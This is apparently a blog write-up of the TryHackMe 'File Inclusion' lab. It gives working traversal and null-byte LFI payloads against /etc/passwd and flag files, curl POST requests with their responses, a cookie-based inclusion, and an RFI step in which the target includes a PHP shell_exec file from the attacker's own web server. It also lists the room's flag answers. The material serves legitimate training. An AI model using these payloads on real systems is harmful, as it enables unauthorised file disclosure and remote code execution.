Home File Inclusion
Post
Cancel

File Inclusion

This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.

THM Room https://tryhackme.com/room/fileinc

TASK 1 : Introduction

Let’s continue to the next section to deploy the attached VM.

No Answer

TASK 2 : Deploy the VM

Once you’ve deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!

No Answer

TASK 3 : Path Traversal

What function causes path traversal vulnerabilities in PHP?

Answer : file_get_contents

TASK 4 : Local File Inclusion - LFI

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

/etc/passwd /etc/passwd

http://10.10.170.89/lab1.php?file=%2Fetc%2Fpasswd

Answer : lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

Include Include

Answer : includes

TASK 5 : Local File Inclusion - LFI #2

Give Lab #3 a try to read /etc/passwd. What is the request look like?

Lab 3 Lab 3

Answer : /lab3.php?file=../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

Lab 4 Lab 4

Answer : file_get_contents

Try out Lab #6 and check what is the directory that has to be in the input field?

Lab 6 Lab 6

Answer : THM-profile/

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

Lab 6 -etc/os-release Lab 6 -/etc/os-release

Answer : 12.04

TASK 6 : Remote File Inclusion - RFI

We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.

Firstly, i created a file hello.php containing the “malicious” code :

1
2
3
4
5
root@ip-10-10-142-182:~# cd Desktop
root@ip-10-10-142-182:~/Desktop# mkdir RFI
root@ip-10-10-142-182:~/Desktop# cd RFI
root@ip-10-10-142-182:~/Desktop/RFI# nano hello.php
	<?PHP echo "Hello THM"; ?>

Then, i run a python snippet code to have a local webserver available :

1
2
3
4
5
6
7
8
9
import http.server
import socketserver

PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as http:
        print("serving at port", PORT)
        http.serve_forever()
1
root@ip-10-10-142-182:~/Desktop/RFI# python snippet.py

Finally, i search the hello.php file on the local webserver and this print me the “Hello THM” from the hello.php code :

hello.php hello.php

No Answer.

TASK 7 : Remediation

Ready for the challenges?

No Answer

TASK 8 : Challenge

Steps for testing for LFI :

1- Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!

2- Enter a valid input to see how the web server behaves.

3- Enter invalid inputs, including special characters and common file names.

4- Don’t always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.

5- Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.

6- Understand the input validation and if there are any filters!

7- Try the inject a valid entry to read sensitive files

Capture Flag1 at /etc/flag1

Crafted a curl command with the request for flag1 :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
root@ip-10-10-142-182:~# curl -d "file=../../../etc/flag1" -X POST http://10.10.176.203/challenges/chall1.php

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Lab #Challenge-1</title>


    <!-- Bootstrap core CSS -->
    <link href="./css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom Stylesheet -->
    <link href="./css/style.css" rel="stylesheet">

    <!-- Core libraries bootstrap & jquery -->
    <script src="./js/bootstrap5.min.js"></script>
    <script src="./js/jquery-3.6.0.min.js"></script>

    <!-- Custom JS code -->
    <script src="./js/script.js"></script>

  </head>

    <header>
<div class="container">
  <ul class="nav">
  	<li class="nav-item">
    		<a class="nav-link" href="./index.php">Home</a>
	</li>
        <li class="nav-item">
                <a class="nav-link">/</a>
        </li>
 	<li class="nav-item">
	<a class="nav-link active" >Lab #Challenge-1</a>
        </li>
  </ul>
</div>
    </header>
<body>
  <div class="container" style="padding-top: 5%;">
      <h1 class="display-4">File Inclusion Lab</h1>
      <p class="lead">Lab #Challenge-1: Include a file in the input form below
<hr class="my-4">
<div class="alert alert-warning" role="alert">
  The input form is broken! You need to send `POST` request with `file` parameter!
  </div>
  <form action= "#" method="GET">
          <div class="input-group mb-3">
            <div class="input-group-prepend">
              <span class="input-group-text">File Name</span>
            </div>
            <input name='file' type="text" class="form-control" placeholder="For example: welcome.php" aria-label="For example: welcome.php" aria-describedby="basic-addon2">
            <div class="input-group-append">
              <button class="btn btn-success" type="submit" >Include</button>
            </div>
          </div>
        </form>

        <div class='mt-5 mb-5'>
          <h5>Current Path</h5>
          <div class='file-Location'><code>/var/www/html</code></div>
        </div>
        <div>
          <h5>File Content Preview of <b>../../../etc/flag1</b></h5>
	  <code>F1x3d-iNpu7-f0rrn
</code>
    </div>  </body>
</html>
root@ip-10-10-142-182:~#

Or change the form method on the page :

Challenge 1 Challenge 1

Answer : F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

This challenge is about cookie LFI. Once in the challenge, you’ll be block with a guest access :

Challenge 2 Challenge 2

Changing this cookie to “Admin” for logging as admin on this page :

Challenge 2 - Admin Challenge 2 - Admin

After many tries, i got the right cookie set for retreiving the flag : ../../../etc/flag2%00

Challenge 2 - Flag Challenge 2 - Flag

Answer : c00k13_i5_yuMmy1

We see after few tries that there is a .php extension add to the request, so we need to escape this.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
root@ip-10-10-29-157:~# curl -d "file=../../../etc/flag3%00" -X POST http://10.10.218.7/challenges/chall3.php --output file.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1952  100  1926  100    26   940k  13000 --:--:-- --:--:-- --:--:--  953k
root@ip-10-10-29-157:~# cat file.txt 

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Lab #Challenge 3</title>


    <!-- Bootstrap core CSS -->
    <link href="./css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom Stylesheet -->
    <link href="./css/style.css" rel="stylesheet">

    <!-- Core libraries bootstrap & jquery -->
    <script src="./js/bootstrap5.min.js"></script>
    <script src="./js/jquery-3.6.0.min.js"></script>

    <!-- Custom JS code -->
    <script src="./js/script.js"></script>

  </head>

    <header>
<div class="container">
  <ul class="nav">
  	<li class="nav-item">
    		<a class="nav-link" href="./index.php">Home</a>
	</li>
        <li class="nav-item">
                <a class="nav-link">/</a>
        </li>
 	<li class="nav-item">
	<a class="nav-link active" >Lab #Challenge 3</a>
        </li>
  </ul>
</div>
    </header>
<body>
  <div class="container" style="padding-top: 5%;">
      <h1 class="display-4">File Inclusion Lab</h1>
      <p class="lead">Lab #Challenge 3: Include a file in the input form below
<hr class="my-4">
	<form action= ".//chall3.php" method="GET">
          <div class="input-group mb-3">
            <div class="input-group-prepend">
              <span class="input-group-text">File Name</span>
            </div>
            <input name='file' type="text" class="form-control" placeholder="For example: welcome" aria-label="For example: welcome" aria-describedby="basic-addon2">
            <div class="input-group-append">
              <button class="btn btn-success" type="submit" >Include</button>
            </div>
          </div>    
        </form>
	
        <div class='mt-5 mb-5'>
          <h5>Current Path</h5>
          <div class='file-Location'><code>/var/www/html</code></div>
        </div>
        <div>
          <h5>File Content Preview of <b>../../../etc/flag3</b></h5>
	  <code>P0st_1s_w0rk1in9
</code>
    </div>  </body>
</html>

Answer : P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

For this last challenge, I do the same as TASK 6 : 1- snippet python for local webserver

2- hello.php code :

1
<?php echo shell_exec('hostname'); ?>

Then you just need to call your file hello.php from RFI execution :

Playground Playground

Answer : lfi-vm-thm-f8c5b1a78692

This post is licensed under CC BY 4.0 by the author.